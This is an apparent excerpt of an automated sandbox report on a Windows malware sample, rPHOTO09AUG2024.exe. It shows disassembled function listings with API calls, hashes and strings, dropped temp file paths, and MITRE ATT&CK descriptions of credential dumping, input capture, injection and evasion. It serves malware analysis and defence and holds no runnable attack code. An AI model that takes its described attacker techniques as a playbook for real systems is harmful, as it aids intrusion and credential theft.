inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00DB80CB
htons.WSOCK32(00000000,?,00000000), ref: 00DB8108

Strings

255.255.255.255, xrefs: 00DB80E3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: d4bf42c7e46148a9a962ddcec2a4ad8833a478366a42b7b7ec5dc117bc7ad699
Instruction ID: 583affdf2052f3af0c19ce51a511f2d2da2f99f3fb7341f14064d2a643f67b10
Opcode Fuzzy Hash: d4bf42c7e46148a9a962ddcec2a4ad8833a478366a42b7b7ec5dc117bc7ad699
Instruction Fuzzy Hash: 9F11C234500305EBCB10AF68CC46FEDB369FF04350F108526E912972D1DA71A811D7B1

Function 00D50A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D43C26,00E062F8,?,?,?), ref: 00D50ACE

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

_wcscat.LIBCMT ref: 00D850E1

Strings

c, xrefs: 00D50B0E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: c
API String ID: 257928180-921687731
Opcode ID: 78f38054d65c5471ee293fe4ee7ba27d86ab71f7d3ffb79fc11f8806d6df1a49
Instruction ID: a4380053c4ed8780224d7bd86e8d3e070e9ea1563e85951c1494afc7e7b300cb
Opcode Fuzzy Hash: 78f38054d65c5471ee293fe4ee7ba27d86ab71f7d3ffb79fc11f8806d6df1a49
Instruction Fuzzy Hash: 1411A134A042099BCF00EBA4DC42ED977F9EF48351B0040A5BD98E7281EB74DACC8B71

Function 00D992E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00D9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D9B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D99355

Strings

ListBox, xrefs: 00D9931F
ComboBox, xrefs: 00D992F4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 979cfa7169df3d06cba59635ed435436ee0da0b22dad7e5d7dc23004ed91e680
Instruction ID: 8d8594e82eb9d92b2e178eac305ba522000d070c5ec6a497363aa6763f8e2ea0
Opcode Fuzzy Hash: 979cfa7169df3d06cba59635ed435436ee0da0b22dad7e5d7dc23004ed91e680
Instruction Fuzzy Hash: 99019271A45219AB8F04EF64CCA28FEB769FF06320B140619B972573D2DB31690C8770

Function 00D991DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00D9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D9B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00D9924D

Strings

ListBox, xrefs: 00D99217
ComboBox, xrefs: 00D991EC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d051ec644dba920255b8d354c26486daa719f3ba91b8b033f0a2055fa2c214f8
Instruction ID: e4d51a7e3e8e02199d7f46f214b732ebdec04ca9be969717758b31665970aa2b
Opcode Fuzzy Hash: d051ec644dba920255b8d354c26486daa719f3ba91b8b033f0a2055fa2c214f8
Instruction Fuzzy Hash: F601D471A412087BCF04EBA4D9A2EFFB3ACDF05310F140019B952672C2EA116E0C8272

Function 00D99264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00D9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D9B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00D992D0

Strings

ListBox, xrefs: 00D9929C
ComboBox, xrefs: 00D99271

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 1b914e42926b1cf7c2845564c8e5d95b5a4b9051da402e4e91dc92b596d9e1fa
Instruction ID: 54c4a849a4d137c6bfa4410237bd704d07e734f0b594e50c8b1a4e750a8081db
Opcode Fuzzy Hash: 1b914e42926b1cf7c2845564c8e5d95b5a4b9051da402e4e91dc92b596d9e1fa
Instruction Fuzzy Hash: E901A271A412097BCF04FBA4D992EFFB7ACDF11310F690119B952632C2DA219E0C9275

Function 00D66DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00D66DD0
__calloc_crt.LIBCMT ref: 00D66DE9

Strings

@R, xrefs: 00D66E00

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __calloc_crt
String ID: @R
API String ID: 3494438863-2347139750
Opcode ID: a50257c9c66f76866de1996c48dda48c055fd81805073276b26ac711686a8e46
Instruction ID: 3b92e907b0314142254ff216d16bf1ee90e18e86f947d1731ed8b0f80106a59e
Opcode Fuzzy Hash: a50257c9c66f76866de1996c48dda48c055fd81805073276b26ac711686a8e46
Instruction Fuzzy Hash: FAF06271308616DFF724DF6AFD0176127D9EB00720B144526F600EB2A1EB31C8D59AB4

Function 00DA51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00DA51E8
_wcscmp.LIBCMT ref: 00DA51FA

Strings

#32770, xrefs: 00DA51F4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: c793ccb4fc8f0dd6f4cb67bd218a2b4b2f3c3e0404bf337b8bafdec47be3d842
Instruction ID: 6c1df14efe007ec299866420d25369c2fb7dfa5f5288f34454d5a36baeae1e20
Opcode Fuzzy Hash: c793ccb4fc8f0dd6f4cb67bd218a2b4b2f3c3e0404bf337b8bafdec47be3d842
Instruction Fuzzy Hash: 7FE09B72A0422D1BD7109799AC45FA7F7ACEB45761F000166F914D3150D56099458BF5

Function 00D981BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D981CA

Part of subcall function 00D63598: _doexit.LIBCMT ref: 00D635A2

Strings

Error allocating memory., xrefs: 00D981C3
AutoIt, xrefs: 00D981BE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: a34d7b4f42d4d2b760c2b07aa913a1545a857a701820da41eb1ff026c6f0a2b8
Instruction ID: 2133d256c719bf6b27ad2d06280ec4962c45608454f2bd360147de0f7904b83e
Opcode Fuzzy Hash: a34d7b4f42d4d2b760c2b07aa913a1545a857a701820da41eb1ff026c6f0a2b8
Instruction Fuzzy Hash: 55D017363C535937D71432A96C0BFCAAA88CB15B52F044026BB08A66D38AD299D252F9

Function 00D7B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00D7B564: _memset.LIBCMT ref: 00D7B571

Part of subcall function 00D60B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D7B540,?,?,?,00D4100A), ref: 00D60B89

IsDebuggerPresent.KERNEL32(?,?,?,00D4100A), ref: 00D7B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D4100A), ref: 00D7B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7B54E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 3b4a5f2af7bc798286f5f00340002ff773ee05df4917d7cb21373e1487b71064
Instruction ID: d6a4e7ad15b1b15f701f3fc6e787a7774f594ca31d824e384b3e70b3131425ad
Opcode Fuzzy Hash: 3b4a5f2af7bc798286f5f00340002ff773ee05df4917d7cb21373e1487b71064
Instruction Fuzzy Hash: 28E0C9706007528FD721EF69E5057527AE4AB04B58F04C92DE44AC6761EBB5D448CBB1

Function 00DC5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DC5BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DC5C08

Part of subcall function 00DA54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA555E

Strings

Shell_TrayWnd, xrefs: 00DC5BEE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 537664caf36214deae0c456952965874218e480eb200b71708ce0e96234df09c
Instruction ID: 9fb5e80853bd8d6e5a5b9c2702d38c5e76cdc667d5aeb5883c6dfd21431d1a0e
Opcode Fuzzy Hash: 537664caf36214deae0c456952965874218e480eb200b71708ce0e96234df09c
Instruction Fuzzy Hash: BAD0C931398312BAE764AB70AC0BFE76A15AB05B51F010825B749EA2D0D9E45811C670

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rPHOTO09AUG2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\Sancha

C:\Users\user\AppData\Local\Temp\autA80A.tmp

C:\Users\user\AppData\Local\Temp\autA849.tmp

C:\Users\user\AppData\Local\Temp\savager

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
rPHOTO09AUG2024.exe

Function 00D43B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00D44AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00D44FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00DA93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00D43015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00D43041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00D471EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00D43A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00D43778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 00D43633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 010825C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00D4F8CF Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Function 00D439E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
